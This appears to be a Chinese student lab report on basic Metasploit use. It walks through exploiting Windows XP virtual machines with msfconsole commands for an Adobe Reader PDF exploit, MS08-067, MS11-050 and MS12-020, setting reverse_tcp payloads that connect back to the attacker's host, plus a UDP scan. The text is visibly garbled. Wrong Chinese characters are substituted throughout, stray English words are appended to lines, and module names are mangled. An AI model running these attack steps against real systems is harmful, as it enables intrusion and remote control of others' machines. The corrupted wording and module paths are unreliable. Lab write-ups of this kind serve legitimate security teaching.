Exp5 MSF基礎運用 20154320 李超

 

實驗後回答問題

  • 用本身的話解釋什麼是exploit,payload,encode.
  • exploit:起運輸的做用,將數據傳輸到對方主機。
  • payload:其實就是指裝載的「具體內容」。就至關於shellcode同樣。
  • encode:對須要傳輸的文件進行編碼,使其達到免殺效果。

實驗總結與體會

  • 經過此次MSF基礎應用的實驗。我對MSF裏面包括的6個模塊都有了必定的認識,先是exploit模塊,也就是咱們說的滲透模塊,包括主動滲透和被動滲透,老師在課上也生動的講述了區別,我就不贅述了。exploit起運輸的做用,將數據傳輸到對方主機。 post模塊指的是在meterpreter中的那些具體操做,好比抓屏,抓鍵什麼的。而後是payload模塊,payload其實就是指裝載的「具體內容」。就至關於shellcode同樣。若是exploit至關於運載火箭,那麼Payload就至關於要投放的彈頭。payload有三個子目錄,分別是single(獨立),stager(傳輸器),stage(傳輸體)。encoder對須要傳輸的文件進行編碼,使其達到免殺效果,還能消除像「0x00」這種壞字符;nop是空指令(0x90),在「滑翔區」中有重要的應用。最後一個是Auxiliary輔助模塊,這是用來蒐集情報的,每個模塊都是一個源代碼。咱們能夠在usr/share/metasploit—framework/modules/中查看每一個模塊。html

  • 操做起來,其實就是一個套路,先肯定攻擊模塊,使用模塊的命令是use, 而後設置攻擊載荷set payloads,再是在每一步的時候都要確認參數,使用show options命令觀察,show targets能夠查看能被攻擊的操做系統等等。這裏就不贅述了。但具體操做起來,就是會有各類問題,好比瀏覽器的版本問題,xp虛擬機的版本問題,任何一個小問題,都會讓咱們的實驗結果不理想。不過還好,最後都一一克服了。也許這就是實驗的魅力吧,老師故意給咱們設置不少障礙,而後讓咱們本身想辦法去跨越障礙,最後到達勝利的終點。重要的不是結果,重要的而是實驗的這個過程,這個過程才能真正的讓咱們學到東西。不要輕言放棄,要激流勇進,克服一個個困難老是有成就感的!shell

Adobe閱讀器滲透攻擊

實驗前準備

  • 兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3。windows

  • 設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠ping通。api

  • kali下打開顯示隱藏文件。瀏覽器

實驗過程

  • 在kali終端中開啓msfconsole。安全

  • 輸入命令use exploit/windows/fileformat/adobecooltypesing,進入該漏洞模塊的使用。網絡

  • 使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷。session

  • 輸入命令show options顯示咱們須要在攻擊前須要設置的數據。tcp

  • set FILENAME xxx.pdfpost

  • set LHOST "KALI 的 Ip"

  • set LPORT xxxx

  • 輸入exploit,生成pdf文件,能夠看到pdf所在文件夾,將pdf複製到靶機裏。

 

 

 

 

  • 使用命令back退出當前模塊,並使用use exploit/multi/handler新建一個監聽模塊。具體過程不贅述。

  • 使用命令exploit開始攻擊,在xp中打開pdf。這裏pdf比較難打開。咱們能夠選擇在kali中等結果。

  • 最開始回連不成功,需將網絡改爲NAT模式
  • 以後回連成功

 

 

 

 

 

 

  • 在靶機xp中使用命令netstat -an,看本地tcp鏈接。

 

MS08_067漏洞滲透攻擊實踐

實驗前準備

  • 兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(英文版)。

  • 在VMware中設置兩臺虛擬機網絡爲NAT模式,自動分配IP地址,以後兩臺虛擬機就能夠直接ping通。

實驗過程

  • 最開始ping了半天,ping不通,後來發現是ip地址不在同一個網段上,須要從新設置xp的ip地址。具體過程不贅述,地球人都會。由於這裏是c類地址,因此前三位同樣。個人kali ip是192.168.124.130,xp ip設置爲:192.168.124.128。

  • 在kali終端中開啓msfconsole。

  • 而後輸入命令search ms08_067,會顯示出找到的滲透模塊。

 

  • 輸入命令use exploit/windows/smb/ms08067netapi,進入該漏洞模塊的使用。

  • 再輸入命令show payload會顯示出有效的攻擊載荷。

 

  • show targets會顯示出能夠被攻擊的靶機的操做系統型號。

 

  • 使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。再輸入命令show options顯示咱們須要在攻擊前須要設置的數據,以下圖紅框圈住的部分。

 

  • set LHOST "kali Ip"

  • set RHOST "Win xp Ip"

 

  • 看看兩個主機能不能ping通。

 

  • exploit開始攻擊,第一次失敗,關閉防火牆後成功
  • 在kali上執行ipconfig/all。

 

 

 

 

  • 在win xp上執行一樣的命令,以下圖所示:

 

輔助模塊:udp_sweep

實驗前準備

  • 兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp2/3。

  • 設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠相互間ping通(關閉靶機防火牆)。

  •  

    模塊介紹

    • 使用udp對指定IP地址主機進行udp掃描

    實踐過程

    • 利用該模塊填寫目的IP來對目的IP地址進行掃描

  •  

  •  

     

IE瀏覽器滲透攻擊——MS11050安全漏洞

實驗前準備

  • 兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(包含IE7)。

  • 設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠相互間ping通(關閉靶機防火牆)。

實驗步驟

  • 在kali終端中開啓msfconsole。
  • 輸入命令use windows/browser/ms11050mshtml_cobjectelement,進入該漏洞模塊。

  • 輸入info查看信息:

 

  • show targets看看目標:

 

  • 再show option,都是老套路。

 

 

  • 而後exploit攻擊!能夠看見生成一個網址。

 

 

 

 

  • 這個時候kali中顯示一個session 1已經建立,輸入命令sessions -i 1,開始鏈接。而後攻擊成功了

 

MS12-020漏洞攻擊

         遠程桌面協議(端口號:3389)

         Windows在處理某些對象時存在錯誤,可經過特製的RDP報文訪問未初始化的或已經刪除的對象,致使任意代碼執行,而後控制系統。

serch ms-12-020

 

 設置RHOST

 

exploit

相關文章
相關標籤/搜索